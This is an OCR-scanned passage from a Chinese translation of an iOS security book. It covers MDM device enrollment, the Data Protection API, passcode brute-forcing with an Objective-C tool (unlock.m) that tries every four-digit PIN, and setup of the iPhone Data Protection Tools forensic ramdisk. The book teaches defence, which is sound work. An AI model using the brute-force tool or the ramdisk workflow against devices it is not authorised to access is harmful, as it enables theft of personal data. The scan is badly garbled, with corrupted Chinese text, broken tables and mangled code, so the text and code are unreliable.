件 管理 器 中 注册 , 你 就 会 看 到 Enroll 按 钮 。 不 过 , 大 家 首先 需要 为 服务 器 安装 信任 描述 文件 (Trust 
Profile )， 这 样 才能 验证 该 注册 描述 文件 的 签名 。 


iPod 会 10:25 PM 


simba.local/devicemans © 


My Devices 
Devices Profiles 





This iPod 


Enroll this iPod to allow it to be remotely 
managed. 


Once enrolled you will also be able to wipe all 
data from and lock access to this iPod. 














a 从 名 问 


图 2-27 My Devices 页 面 截 图 
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如 果 触 击 Profiles 选 项 卡 ， 你 就 会 看 到 可 用 描述 文件 的 列表 ( 见 图 2-28 )。 大 家 首先 应 该 安装 
信任 描述 文件 ， 因 为 它 包含 了 为 其 他 描述 文件 签名 所 需 的 证 书 。 要 安装 该 描述 文件 , 请 触 击 该 信 
任 描述 文件 名 称 右 侧 的 Install 按 钮 。 


iPod 会 6:13 PM [3 





My Devices 











Devices Profiles 
Settings for Everyone 县 
Show Contents Install 
Trust Profile for iOS Hackers Inc. 县 
Show Contents Install 
New Enrollment Profile 县 
Enrollment Profile Install 

| Logout 
a cea 


图 2-28 ”My Devices 页 面 中 的 Profiles 列 表 


在 触 击 Install 按 钮 之 后 ， 你 就 会 看 到 如 图 2-29 所 示 的 确认 界面 。 要 了 解 更 多 与 该 描述 文件 有 
关 的 信息 ， 请 触 击 More Details。 要 安装 该 描述 文件 的 话 ， 请 触 击 Install 按 钮 。 





iPod 仿 ` 10:26 PM Ey 


[2 Install Profile 


SPA Trust Profile for iO... 








sc ” 测 
) Not Verified 


Description Configures your device to trust 
the Profile Manager server. 


Signed simba.local Code Signing 
Certificate 


Received Oct 20, 2011 


Contains _ Certificate 


More Details > 











图 2-29 确认 安装 信任 描述 文件 的 界面 
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因为 不 能 验证 该 信任 描述 文件 ， 所 以 你 会 看 到 如 图 2-30 所 示 的 警告 界面 。 该 界面 提示 用 户 : 
将 修改 受信 任 根 证 书 的 列表 。 


iPod 令 10:27 PM E33 





Cancel Wai rning Install 





Unverified Profile 





The authenticity of “Trust Profile for 
iOS Hackers Inc.” cannot be 
verified. Installing this profile will 
change settings on your iPod. 





Root Certificate 





Installing the certificate“iOS 
Hackers Inc.” will add it to the list of 
trusted certificates on your iPod. 











图 2-30 ”信任 描述 文件 警告 界面 
现在 ， 如 果 返 回 My Devices 页 面 ， 并 触 击 Enroll 按 钮 注册 自己 的 设备 ， 你 就 会 看 到 如 图 2-31 
所 示 的 界面 。 绿色 的 Verified 标 志 表 示 该 描述 文件 的 签名 已 经 得 到 验证 ， 是 受信 任 的 。 触 击 Install 
按钮 ， 安 装 名 为 Device Enrollment 的 描述 文件 ， 这 将 为 该 设备 启用 远程 设备 管理 。 


iPod 仿 10:27 PM Ea 








Cancel Install Profile 


ps 





Device Enrollment 
iOS Hackers Inc. 





Description Enrolls your device with the 
management server. 


Signed simba.local Code Signing 
Certificate 


Received Oct 20, 2011 


Contains Device enrollment challenge 


More Details > 











2-31 Device Enrollment 确 认 界面 
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接着 你 会 看 到 如 图 2-32 所 示 的 警告 界面 。 注 意 , 它 会 提示 用 于 设备 管理 的 API 端 点 的 完整 URL。 





Installing this profile will allow the 
administrator at 
“https://simba.local/devicemanagem 
ent/api/device/connect” to remotely 
manage your iPod. 


The administrator may collect 
personal data, add/remove accounts 
and restrictions, list, install, and 
manage apps, and remotely erase 
data on your iPod. 





图 2-32 ”Mobile Device Management 和 警告 界面 


在 安装 完 该 描述 文件 后 ， 你 会 看 到 如 图 2-33 所 示 的 界面 。 


Profile Installed Done 


Remote Managem... 
iOS Hackers Inc. 


yO Verified 
Description Allows the server to manage 
your device. 


Signed simba.local Code Signing 
Certificate 


Received Oct 20, 2011 


Contains SCEP enrollment request 
Mobile Device Management 





More Details 





图 2-33 ”描述 文件 安装 完成 
大 家 可 以 触 击 More Details 看 看 该 描述 文件 中 都 包含 了 哪些 证 书 、 为 它 签 名 的 是 哪个 证 书 ， 还 
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可 以 了 解 更 多 与 所 安装 的 Device Re 术 文件 有 关 的 信息 。 详 细 信息 界面 如 图 2-34 所 示 。 





Profile Insta... ee MENELe [SR 





Signing Certificate 


Ra Simba.local Code Sig... 
FA lssued by: IntermediateCA SI... > 
| 


国 ”Expires: October 19, 2012 








Certificate 
本 


ET Device Management… 
国 | Issued by: IntermediateCA Sl... > 
| Expires: October 19, 2012 








Mobile Device Management 


Rv Device Management 
PA URL: https://simba.local/devic... > 


| Topic: com.apple.mgmit.XServ... 

















图 2-34 ”Remote Management 详 情 界面 


现在 , 如 果 返 回 描述 文件 管理 器 中 的 My Devices 页 面 , 你 会 看 到 上 面 列 出 了 刚刚 注册 的 设备 ， 
如 图 2-35 所 示 。 用 户 可 以 从 该 页 面 远程 锁定 、 擦 除 该 设备 ， 或 清除 该 设备 的 密码 。 








iPod 全 10:28 PM Ea 
My Devices 





Devices Profiles 


This iPod Remove 


- 


Serial Number: C3YDGALHDCP7 
Lock 


Wipe 


Clear Passcode 








Logout 








图 2-35 ”完成 设备 注册 之 后 的 My Devices 页 面 
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2.3 小结 


任何 用 于 存储 或 访问 企业 敏感 数据 的 i0S 设 备 都 必须 经 过 合适 的 配置 ， 以 便 充 分 保护 这 些 数 
据 。 这 些 配 置 包括 设置 强 密码 、 自 动 锁定 和 其 他 与 安全 相关 的 设置 。 虽然 可 以 由 IT 管 理 员 亲手 配 
置 每 个 用 户 的 设备 ， 但 这 样 做 既 费 时 费力 又 容易 出 错 ， 而 集中 管理 这 些 配 置 就 好 多 了 。 

本 章 介绍 了 两 种 集中 管理 iOS 配 置 的 方式 : 使 用 iPhone 配置 实用 工具 和 使 用 Lion Server 的 描述 
文件 管理 器 。iPhone 配 置 实用 工具 更 为 简单 ， 更 易 上 手 ， 但 只 适合 管理 少量 设备 。 要 管理 大 量 设 
备 ，Lion Server 描 述 文件 管理 器 这 样 的 MDM ( 移动 设备 管理 ) 解决 方案 更 方便 。 除 了 能 完成 相 
同 的 配置 ，MDM 解 决 方案 的 管理 功能 更 多 ， 比 如 远程 锁定 、 探 除 设备 或 清除 密码 。 
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与 传统 的 桌面 工作 站 相 比 ， 移 动 设备 因为 更 容易 遗失 或 被 穷 取 ， 泄 圳 敏感 数据 的 风险 更 大 。 
虽然 传统 的 工作 站 和 笔记 本 可 以 通过 带 有 启动 前 验证 的 全 磁盘 加 密 进 行 保护 , 但 大 多 数 移动 平台 
并 不 能 进行 启动 前 验证 。 移 动 平 台 提 供 的 数据 加 密 功 能 只 有 在 设备 启动 后 才能 生效 。 而 触摸 屏 或 
移动 设备 键盘 数据 输入 的 局 限 性 也 使 得 输入 长 密码 不 太 可 行 。 这 些 因素 都 令 移动 设备 的 数据 保护 
更 具 挑 战 性 。 

本 章 , 我 们 讨论 iOS 中 保护 静态 数据 ( data-at-rest ) 的 主要 措施 : Data Protection API。 这 里 要 
展示 应 用 开发 者 会 怎样 使 用 该 API, 还 会 说 明 怎样 利用 自 定义 的 ramdisk 引 导 iOS 从 而 对 该 API 进 行 
攻击 。 你 会 看 到 4 位 的 锁 屏 密码 非常 容易 被 猜 解 ， 而 4 位 锁 屏 密码 被 猜 解 后 ，iOS 设 备 上 利用 Data 
Protection API 加 密 的 所 有 数据 就 都 可 以 被 解密 了 。 


3.1 数据 保护 


苹果 公司 在 iOS 4 中 引入 了 Data Protection API, 而 且 该 API 在 iOS $ 中 仍 被 使 用 。Data Protection 
API 的 设计 初衷 是 让 应 用 开发 者 能 尽 可 能 简单 地 对 文件 和 keychain 项 中 存储 的 敏感 用 户 数 据 施 以 
足够 的 保护 ， 以 防 它们 在 用 户 设备 丢失 时 被 泄露 。 开 发 人 员 要 做 的 就 是 指明 keychain 中 的 哪些 文 
件 或 项 可 能 包含 敏感 数据 ， 并 说 明 这 些 数据 在 何 时 一 定 是 可 访问 的 。 例如， 开发 者 可 能 会 指示 某 
些 包 含 敏 感 数据 的 文件 或 keychain 项 只 有 在 设备 解锁 后 才 可 访问 。 这 是 种 常见 的 情形 ， 因 为 用 户 
在 使 用 应 用 之 前 一 定 要 将 设备 解锁 。 此 外 ， 开 发 者 也 可 能 会 指定 某 些 文件 或 keychain 项 总 是 可 访 
问 的 ,这 样 一 来 ， 就 算 在 设备 锁定 时 这 些 文件 也 是 不 受 保护 的 。 在 应 用 的 源 代码 中 ,开发 者 会 用 
定义 了 文件 和 keychain 项 的 保护 等 级 ( protection class ) 的 常量 来 标记 它们 。 不 同 保护 等 级 的 区 别 
在 于 它们 是 否 对 文件 和 keychain 项 加 以 保护 ， 以 及 受 相应 保护 等 级 保护 的 数据 何 时 可 用 ( 例如， 
总 是 可 用 或 只 有 在 设备 解锁 后 可 用 )。 

不 同 的 保护 等 级 是 通过 密 钥 分 级 实现 的 ， 其 中 各 等 级 的 密 钥 派生 自若 干 其 他 的 密 钥 或 数据 。 
图 3-1 展 示 了 文件 加 密 中 涉及 的 密 钥 分 级 。 在 该 密 钥 分 级 的 根部 是 UID 密 钥 和 用 户 的 密码 。 
iOS 设 备 都 有 与 之 对 应 的 唯一 UID 密 铀 ,而且 该 密 钥 舱 入 在 板 载 的 加 密 加 速 器 中 。 密 钥 本 身 是 无 
法 通过 软件 访问 的 , 不 过 加 速 器 可 以 使 用 该 密 钥 加 密 或 解密 指定 的 数据 。 当 设备 被 解锁 时 ， 用户 
的 密码 就 会 由 修改 过 的 PBKDF2 算 法 加 密 多 次 以 生成 密码 密 钥 。 该 密码 密 钥 会 保存 在 内 存 中 ， 直 
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到 设备 再 次 被 锁定 。UID 密 钥 还 被 用 于 加 密 某 静 态 字 节 种 ， 从 而 生成 设备 密 钥 。 这 一 设备 密 铀 用 
来 为 所 有 表示 与 文件 相关 的 各 保护 等 级 的 等 级 密 钥 加 密 。 某 些 等 级 密 钥 的 加 密 也 会 用 到 密码 密 
钥 ， 以 确保 只 有 在 设备 解锁 后 才 可 访问 这 些 等 级 密 钥 。 












UID 密 钥 


















































设备 密 钥 密码 密 钥 

NSFileProtectionNone NSFileProtectionCompleteUntilFirstUserAuthentication NSProtectionComplete 
等 级 密 钥 等 级 密 钥 等级 密 钥 
文件 密 铀 文件 密 钥 文件 密 铀 文件 密 铀 文件 密 铀 












































图 3-1 数据 保护 密 钥 分 级 


Sogeti 公 司 的 研究 人 员 详 实地 记录 了 iOS 数 据 保护 本 质 , 并 在 2011 年 5 月 的 Hack in the Box 阿 姆 
斯 特 丹 大 会 上 展示 了 这 些 内 容 (http:/code.google.com/p/iphone-dataprotection )。 要 更 深入 地 了 解 
iOS 中 数据 保护 的 实现 方式 ， 请 参考 这 些 内 容 。 














Data Protection API 


有 了 Data Protection API， 应 用 便 可 以 通过 传递 新 定义 的 保护 等 级 标志 给 已 存在 的 API， 声 明 
文件 系统 中 的 文件 和 keychain 中 的 项 何 时 该 被 解密 。 保 护 等 级 指定 底层 系统 何 时 可 以 自动 解密 指 
定 的 文件 或 keychain 项 。 

要 为 文件 启用 数据 保护 ， 应 用 必须 使 用 NSFileManager 类 为 NSFileProtectionKey 属 性 
设置 一 个 值 。 表 3-1 描 述 了 支持 的 值 以 及 它们 的 含义 。 默 认 情 况 下 ， 所 有 文件 的 保护 等 级 都 是 
NSFileProtectionNone， 这 表示 任何 时 候 都 可 以 读 写 这 些 文件 。 
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表 3-1 文件 保护 等 级 
保护 等 级 描述 
NSFileProtectionComplete 文件 受到 保护 ， 而 且 只 有 在 设备 未 被 锁定 时 才 可 访问 
NSTi1eProtectionComplete 文件 受到 保护 ,而 且 只 有 在 设备 未 被 锁定 时 才 可 打开 ， 不 过 即便 在 设备 被 
[= TT 
ee 锁定 时 ， 已 经 打开 的 文件 还 是 可 以 继续 使 用 和 写 入 


NSFileProtectionCompleteUntil 文件 受到 保护 ， 直 到 设备 启动 上 且 用 户 第 一 次 输入 密码 
FirstUserAuthentication 


NSFileProtectionNone 文件 未 受 保护 ， 随 时 可 以 访问 













































































以 下 代码 展示 了 如 何 为 已 经 存在 的 文件 设置 NSFileProtectionKey。 这 里 假设 文件 路 径 存 
放 在 变量 filePath 中 。 

// 创建 NSProtectionComplete 属 性 

NSDictionary *protectionComplete = 


[NSDictionary dictionaryWithObject:NSFileProtectionComplete 
forKey:NSFileProtectionKey]; 


// 为 <filePath> 处 的 文件 设置 属性 
[[[NSFileManager] defaultManager] setAttributes:protectionComplete 
ofItemAtPath:filePath error:nil]; 


» 


通过 为 SecItemAdd 或 secItemUpdate 晴 数 指 定 保护 等 级 ， 我 们 就 能 够 以 类 似 的 方式 为 
keychain 中 的 项 指定 保护 等 级 了 。 除 此 之 外 ， 应 用 还 可 以 指定 keychain 项 能 和 否 转移 到 其 他 设备 。 
如 果 使 用 了 某 种 -rnhispeviceonly 保 护 等 级 ,相应 的 keychain 项 就 会 使 用 由 设备 密 钥 得 出 的 密 铀 
加 密 。 这 样 就 确保 只 有 创建 该 keychain 项 的 设备 才能 对 其 解密 。 默 认 情 况 下 ， 所 有 keychain 项 在 
创建 时 都 具有 kSecattraAccessipleAlways 保 护 等 级 ， 表示 它们 随时 可 以 被 解密 并 转移 到 其 他 
设备 。 表 3-2 展 示 了 可 用 的 keychain 项 保护 等 级 。 


表 3-2 ” keychain 项 保护 等 级 








































































































保护 等 级 描 述 
人 keychain 项 受到 保护 ， 只 有 在 设备 未 被 锁定 时 才 可 访问 
kSecAttrAccessible ; pa eA 动 并 日 用 户 第 一 次 输入 密 古 
Ee keychain 项 受到 保护 ， 直 到 设备 启动 并 且 用 户 第 一 次 输入 密码 
2 keychain 项 未 受 保护 ， 任 何 时 候 都 可 访问 
Always 
kSecAttrAccessible 
WhenUnlocked keychain 项 受到 保护 ， 只 有 在 设备 未 锁定 时 才 可 访问 ， 而 且 不 可 以 转移 到 其 他 设备 
ThisDeviceonly 
kSecAttrAccessible keychain 项 受到 保护 ， 直 到 设备 启动 并 且 用 户 第 一 次 输入 密码 ， 而 且 不 能 转移 到 另外 
AfterFirstUnlock Na 
ThisDeviceOonly 的 设备 
kSecAttrAccessible i 下 千 何 时 候 都 可 访问 人 名 全 
i ee keychain 项 未 受 保护 ， 任 何 时 候 都 可 访问 ,但 不 能 转移 到 男 外 的 设备 





要 为 keychain 中 的 项 启用 数据 保护 ,我 们 需要 设置 ksecAttrAccessible 属 性 。 以 下 代码 将 
属性 设置 为 kSecAttrAccessibleWhenUnlocked。 











Ny 
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NSMutableDictionary *query = 
[NSMutableDictionary dictionaryWithObjectsAndKeys: 
(id)kSecClassGenericPpassword, (id)kSecClass, 
@"MyItem", (id)kSecAttrGeneric, 
username, (id)kSecAttrAccount, 
password, (id)kSecVvalueData, 
[[NSBundle mainBundle] bundleIdentifier], (id)kSecAttrService, 
@"", (id)kSecAttrLabel, 
@"", (id)kSecAttrDescription, 
(id)kSecAttrAccessibleWhenUnlocked, (id)kSecAttrAccessible, nill]; 


OSStatus result = SecItemAdd( (CFDictionaryRef)query, NULL); 


3.2 ”对 数据 保护 的 攻击 


为 了 了 解数 据 保护 的 局 限 性 和 应 该 采取 哪些 补救 措施 , 我 们 先 来 看 看 用 户 密码 要 有 多 高 的 强 
度 , 以 及 攻击 者 理论 上 讲 是 如 何 从 和 遗失 或 被 盗 的 设备 上 恢复 数据 的 。 从 中 可 以 看 出 ,应 用 开发 者 
充分 使 用 Data Protection API 保 护 敏感 信息 ， 以 及 企业 强制 要 求 存放 或 处 理 敏 感 信 息 的 OS 设备 使 
用 强 密码 ， 是 十 分 重要 的 。 


3.2.1 ”对 用 户 密码 的 攻击 


正如 前 面 所 描述 的 ， 我 们 可 以 通过 标准 PBKDF2 算 法 的 修改 版 利用 用 户 密码 生成 密码 密 钥 。 
在 iOS 中 ,这 种 修改 过 的 PBKDF2 算 法 使 用 带 UID 密 钥 的 AES 加 密 ， 而 不 是 诸如 SHA-1 或 MD5 这 样 
的 标准 加 密 散 列 函 数 。 因 为 软件 不 能 直接 访问 UID 密 钥 ， 所 以 这 确保 了 密码 密 钥 只 能 由 设备 本 身 
得 出 ,这 样 就 可 以 防止 攻击 者 离线 破解 密码 ， 避免 他 们 动用 手头 的 全 部 计算 资源 破解 密码 。 这 样 
做 也 可 确保 密码 密 钥 对 每 台 设备 而 言 都 是 唯一 的 ， 即 便 不 同 设备 的 用 户 使 用 了 相同 密码 。 

除 此 之 外 ， 这 种 PBKDF2 算 法 的 迭代 次 数 是 可 变 的 ， 而 且 取 决 于 iOS 设 备 的 CPU 速度 。 这 样 
我 们 就 可 以 确保 这 个 迭代 次 数 足 够 低 , 使 得 用 户 在 输入 密码 时 不 会 感觉 有 延迟 , 但 这 个 迭代 次 数 
又 应 该 是 足够 高 的 ， 从 而 让 蛮 力 破解 或 字典 猜 解 密码 的 攻击 者 处 理 速 度 明 显 减 慢 。 
根据 不 同 的 配置 设置 ， 在 输入 错误 密码 后 ，iOS 设 备 的 用 户 界面 可 能 出 现 逐 渐 增 加 的 延迟 。 
连续 的 错误 猜测 会 让 这 个 延迟 呈 指 数 级 增长 。 除 此 之 外 , 我 们 可 以 将 设备 配置 成 : 在 连续 输入 错 
误 密 码 一 定 次 数 后 探 除 设备 上 的 所 有 数据 。 不 过 ， 这 些 防 御 措施 只 是 通过 iOS 用 户 界 面 施行 的 。 
如 果 攻 击 者 可 以 为 该 i0S 设 备 越狱 并 运行 自 定 义 的 软件 ， 他 们 就 可 能 自行 编写 工具 通过 更 底层 的 
界面 猜 解 密码 。 例 如 ， 私 有 的 MobileKeyBag 框 架 就 包含 利用 给 定 密码 串 解 锁 设 备 ( MKBUnlock- 
Device ) 以 及 确定 设备 当前 是 否 处 于 锁定 状态 (MKBGetDeviceLockState ) 的 函数 。 这 些 本 
数 是 通 向 内 核 中 IOKit 驱 动 程序 的 简单 前 端 , 可 以 让 人 编写 能 在 已 越狱 OS 设备 上 运行 的 简单 密码 
猜 解 工具 。 代 码 清单 3-1 展 示 了 这 种 工具 的 一 个 示例 。 为 了 让 该 程序 正常 工作 ， 我 们 必须 编译 它 
并 给 定 一 个 特权 BLOB ( 如 果 用 本 书 的 源 代 码 包 创建 程序 , 这 一 过 程 将 自动 完成 )。 如 果 运 行 编译 
工具 时 使 用 了 -B 选 项 , 该 程序 就 会 迭代 完 所 有 可 能 的 四 位 数字 密码 , 并 尝试 使 用 这 些 密码 解锁 设 
备 。 如 果 有 某 个 密码 成 功 解锁 设备 ， 该 程序 就 会 终止 并 打印 出 猜 解 的 密码 。 
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代码 清单 3-1 unlock.m 
#import <stdio.h> 
#import <stdlib.h> 
#import <unistd.h> 


#import <Foundation/Foundation.h> 


extern int MKBUnlockDevice (NSData* passcode, int flags); 
extern int MKBGetDeviceLockState(); 
extern int MKBDeviceUnlockedSinceBoot(); 


void usage (char* argv0) 




















{ 
fprintf(stderr, "usage: %s [ -B | -p <passcode> ]\n", argv0); 
exit (EXIT_ FAILURE); 
} 
int try unlock(const char* passcode) 
{ 
int ret; 
NSString* nssPasscode = [[NSString alloc] initWithCString:passcodel]; 
NSData* nsdPasscode = [nssPasscode dataUsingEncoding:NSUTF8StringEncoding]; 
ret = MKBUnlockDevice (nsdPasscode, 0); 
return ret; 
} 
void try_passcode(const char* passcode) 
{ 
int ret; 
NSString* nssPasscode = [[NSString alloc] initWithCString:passcodel]; 
NSData* nsdPasscode = [nssPasscode dataUsingEncoding:NSUTF8StringEncoding]; 
ret = MKBUnlockDevice(nsdPasscode, 0); 
printf ("MKBUnlockDevice returned %d\n", ret); 
ret = MKBGetDeviceLockState(); 
printf ("MKBGetDeviceLockState returned %d\n", ret); 
} 
VOL get state() 
{ 
int ret; 
ret = MKBDeviceUnlockedSinceBoot (); 
printf ("MKBDeviceUnlockedSinceBoot returned %d\n", ret); 
ret = MKBGetDeviceLockState(); 
printf ("MKBGetDeviceLockState returned %d\n", ret); 
} 
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int main(int argc, char* argv[]) 
{ 

char c; 

int i, mode = 0; 

char* passcode = NULL; 





int Yet 
while ((c = getopt(argc, argv, "Pp:B")) != EOF) { 
switch (c) { 
case 'p': // 尝试 给 定 的 密码 
mode = 1; 
passcode = strdup (optarg); 
break; 
case 'B': // 变 力 模式 
mode = 2; 
break; 
default: 
usage (argv[0]); 
} 
} 
NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] initl]; 


switch (mode) { 


case 0: // 只 用 于 显示 状态 
get_state(); 
break; 

case 1: // 尝试 给 定 的 密码 


get_state(); 
try_passcode (passcode); 
get_state(); 

break; 


case 2: // 变 力 破解 数字 密码 
get_state(); 


for (i = 0; i < 10000; i++) { 
char pelSl1; 
sprintf(pc, "%.4d", i); 





if (try unlock(pc) == 0) { 
printf("Success! PINCODE %s\n", pc); 
break; 
} 
} 
get_state(); 
break; 
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[Pool releasel]; 

return 0; 
} 
通过 记录 每 次 猜测 所 花 的 时 间 , 我 们 可 以 计算 设备 的 破解 率 , 并 利用 它 衡量 复杂 度 各 异 的 密 
码 的 强度 。 对 于 iPhone 4 来 说 ， 密 码 猜测 率 大 概 是 每 秒 9.18 次 。 这 就 是 说 ， 在 最 坏 的 情况 下 ， 猜 
解 一 个 四 位 数字 的 密码 最 多 只 需要 18 分 钟 。iPhone 4 上 不 同 长 度 和 复杂 度 的 密码 所 需 的 最 长 猜 解 
时 间 如 表 3-3 所 示 。 "字母 与 数字 ”一 级 的 复杂 度 是 假设 密码 可 以 由 数字 字符 和 大 小 写字 母 字符 构 
成 。 而 “复杂 ”级 别 的 复杂 度 则 在 此 基础 上 增加 了 iOS 键 盘 上 可 用 的 35 种 符号 字符 。 


表 3-3 ”最 坏 情况 下 设备 密码 猜 解 时 间 (iPhone 4) 



































密码 长 度 复 杂 度 时 间 
4 数字 18 分 钟 
4 字母 与 数字 19 天 
6 字母 与 数字 196 年 
8 字母 与 数字 75.5 万 年 
8 字母 与 数字 ,复杂 2700 万 年 








为 只 能 在 创建 密码 的 设备 上 对 密码 进行 攻击 ， 所 以 6 位 长 度 的 字母 与 数字 混合 密码 对 于 蛮 
力 攻击 来 说 已 经 足够 强大 了 。 不 过 ， 更 具 智 慧 性 的 字典 攻击 的 效率 可 能 高 得 多 。 


3.2.2 iPhone Data Protection Tools 





由 Jean-Baptiste Bédrune 和 Jean Sigwald 编 写 的 Phone Data Protection Tools 是 一 套 开 源 的 iOS 取 
证 工具 包 。 这 些 工 具 来 源 于 对 iOS 4 和 iOS 5 中 Data Protection 的 逆向 工程 ， 还 利用 了 某 个 知名 的 
DEFU 模 式 bootrom 漏 洞 在 设备 上 引导 自 定 义 的 ramdisk 镜 像 。( 详 见 介 绍 越狱 的 第 10 章 。) 





iPhone Data Protection Tools 会 用 自 定义 的 ramdisk 引 导 目 标 设备 ,该 ramdisk 启 用 了 USB 连 





接 上 的 SSH 访 问 ， 还 含有 枚 举 设 备 信 息 、 对 4 位 数字 密码 进行 蛮 力 攻击 ， 以 及 解密 系统 keybag 
(如 果 设 置 了 密码 ， 就 需要 知道 或 猜 解 出 密码 ) 的 工具 。 它 还 可 以 用 来 复制 设备 数据 分 区 的 原 
始 镜像 。 

1. 安装 必要 工具 

我 们 最 好 是 在 带 有 Xcode 4.2( 或 更 高 版 本 ) 以 及 iOS 5 SDK 的 Mac OSX Lion ( 10.7 ) 中 创建 
iPhone Data Protection Tools。 假 设 你 已 经 安装 了 这 些 ， 还 需要 安装 一 些 命令 行 工具 、 系 统 软件 和 
Python 模 块 来 创建 和 使 用 iPhone Data Protection Tools。 

某 些 命令 行 小 工具 会 被 安装 到 /usr/local/bin。 如 果 该 目录 不 存在 的 话 ， 你 就 需要 先 创 建 该 目录 : 

$ sudo mkdir -p /usr/local/bin 

接着 ， 你 需要 下 载 和 安装 1dida， 这 是 个 用 来 查看 及 处 理 代 码 签名 和 通信 的 Entitlements.plist 
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文件 的 小 工具 
$ curl -0O http://networkpx.googlecode.com/files/ldid 
% Total % Received % Xferd Average Speed Time Time Time Current 
Dload Upload Total Spent Left Speed 
100' 32016; .100 32016 0 0 91485 0 --:--:-- --:--:-- --:--:-- 123k 


$ chmod a+x ldid 
$ sudo mv ldid /usr/local/bin/ 


如 果 安 装 Xcode 时 你 没有 选中 UNIX Development Support ， 就 需要 为 codesign_allocate 手 
动 创 建 符号 链接 (symlink ): 
$ sudo ln -s 


/Developer/Platforms/iPhoneOS.platform/Developer/usr/bin/codesign allocate \ 
/usr/local/bin/ 


为 了 修改 已 经 存在 的 ramdisk，iPhone Data Protection Tools 包 含 了 FUSE 文 件 系统 ， 这 种 文件 
系统 可 以 理解 iOS 中 IMG3 格 式 的 固件 文件 。 如 果 系 统 中 尚未 安装 MacFUSE 或 OSXFuse, 请 安装 最 
新 版 本 的 OSXFuse ; 因为 与 MacFUSE 相 比 ， 它 当前 能 得 ee 。 大 家 可 以 从 
http://osxfuse.github.com 下 载 和 安装 OSXFuse， 或 是 利用 如 下 所 述 的 命令 


$ curl -0 -L https://github.com/downloads/osxfuse/osxfuse/OSXFUSE-2.3.8.dmg 











% Total % Received % Xferd Average Speed Time Time Time Current 
Dload Upload Total Spent Left Speed 
100 4719k 100 4719K 0 0 375k 0 0:00:03 0:00:03 --:--:-- 1521k 


$ hdiutil mount OSXFUSE-2.3.8.dmg 
Checksumming Gesamte Disk (Apple_HFS : 0)… 

Gesamte Disk (Apple_ HFS : 0): verified CRC32 SD1B1950D 
verified CRC32 $09B79725 





/dev/diskl1 /Volumes/FUSE for OS X 
$ sudo installer -pkg /Volumes/FUSE\ for\ OS\ X/Install\ OSXFUSE\ 2.3.pkg \ 
-target / 


installer: Package name is FUSE for OS X (OSXFUSE 
installer: Installing at base path / 

installer: The install was successful. 

$ hdiutil eject /Volumes/FUSE\ for\ OS\ XxX/ 
"diskl" unmounted . 

"diskl" ejected. 


iPhone Data Protection Tools 的 Python 脚本 需要 用 Python Cryptography Toolkit ( PyCrypto ) 解 
密 固 件 镜像 以 受 Data Protection 保 护 的 文件 或 keychain 项 。 大 家 可 以 使 用 Python 的 easy_ 
install 命 令 快速 安装 该 库 。 应 该 按照 如 下 方式 进行 安装 ,以 确保 它 同 时 支持 32 位 和 64 位 的 x86 
架构 。 


$ sudo ARCHFLAGS='-arch i386 -arch x86_ 64' easy install pycrypto 
Searching for pycrypto 

Reading http://pypi.python.org/simple/pycrypto/ 

Reading http://pycrypto.sourceforge.net 

Reading http://www.amk.ca/python/code/crypto 

Reading http://ww.pycrypto.org/ 

Best match: pycrypto 2.5 
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Downloading http://ftp.dlitz.net/pub/dlitz/crypto/pycrypto/pycrypto-2.5.tar.gz 
Processing pycrypto-2.5.tar.gz 

[| 

Installed /Library/Python/2.7/ 
site-packages/pycrypto-2.5-py2.7-macosx-10.7-intel. 

egg 

Processing dependencies for pycrypto 

Finished processing dependencies for pycrypto 


这 些 Python 脚本 还 需要 一 些 其 他 的 纯 Python 库 : M2Crypto、Construct 和 ProgressBar。 大 家 应 


该 使 用 easy_instal1 命 令 安装 这 些 库 。 [= 
$ sudo easy_ install M2crypto construct progressbar 


Searching for M2crypto 

Reading http://pypi.python.org/simple/M2crypto/ 

Reading http://wiki.osafoundation.org/bin/view/Projects/MeTooCrypto 

Reading http://www.postl.com/home/ngps/m2 

Reading http://sandbox.rulemaker.net/ngps/m2/ 

Reading http://chandlerproject.org/Projects/MeTooCrypto 

Best match: M2Crypto 0.21.1 

Downloading http://chandlerproject.org/pub/Projects/MeTooCrypto/M2Crypto-0.21.1- 
py2.7-macosx-10.7-intel.egg 





[| 

Installed /Library/Python/2.7/site-packages/M2Crypto-0.21.1-py2.7-macosx-10.7- 
intel.egg 

Processing dependencies for M2crypto 

Finished processing dependencies for M2crypto 

Searching for construct 

Reading http://pypi.python.org/simple/construct/ 

Reading https://github.com/MostAwesomeDude/construct 

Reading http://construct.wikispaces.com/ 

Best match: construct 2.06 

Downloading http://pypi.python.org/packages/source/c/construct/ 
construct-2.06.tar.gz#md5=edd2dbaa4afc022c358474c96f538f48 

[el] 

Installed /Library/Python/2.7/site-packages/construct-2.06-py2.7.egg 

Processing dependencies for construct 

Finished processing dependencies for construct 

Searching for progressbar 

Reading http://pypi.python.org/simple/progressbar/ 

Reading http://code.google.com/p/python-progressbar/ 

Reading http://code.google.com/p/python-progressbar 

Best match: progressbar 2.3 

Downloading http://python-progressbar.googlecode.com/fi les/ 
progressbar-2.3.tar.gz 

[| 

Installed /Library/Python/2.7/site-packages/progressbar-2.3-py2.7.egg 

Processing dependencies for progressbar 

Finished processing dependencies for progressbar 


最 后 ， 为 了 下 载 iPhone Data Protection Tools 最 新 版 ， 你 需要 安装 Mercurial 源 代码 管理 系统 。 
大 家 也 可 以 按照 如 下 方式 用 easy_instal1 命 令 完成 这 一 工作 。 
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$ sudo easy_ install mercurial 

Searching for mercurial 

Reading http://pypi.python.org/simple/mercurial/ 

Reading http://mercurial.selenic.com/ 

Reading http://www.selenic.com/mercurial 

Best match: mercurial 2.1 

Downloading http://mercurial.selenic.com/release/mercurial-2.1.tar.gz 
Processing mercurial-2.1.tar.gz 

| 

Installing hyg Seript to /usr/Local/bin 


Installed /Library/Python/2.7/site-packages/mercurial-2.1-py2.7-macosx-10.7- 
intel .egg 

Processing dependencies for mercurial 

Finished processing dependencies for mercurial 


至 此 ， 所 有 的 必要 工具 都 应 该 安装 好 了 。 接 下 来 我们 可 以 下 载 iPhone Data Protection Tools 
并 用 它 创 建 自 定义 的 ramdisk 了。 
2. 创建 ramdisk 
大 家 应 该 按照 如 下 方式 用 Mercurial ( hg ) 从 Google code 下 载 耻 hone Data Protection Tools 的 最 
新 版 。 


$ hg clone https://code.google.com/p/iphone-dataprotection 

destination directory: iphone-dataprotection 

requesting all changes 

adding changesets 

adding manifests 

adding file changes 

added 38 changesets with 1921 changes to 1834 files 

updating to branch default 

121 files updated, 0 files merged, 0 files removed, 0 files unresolved 


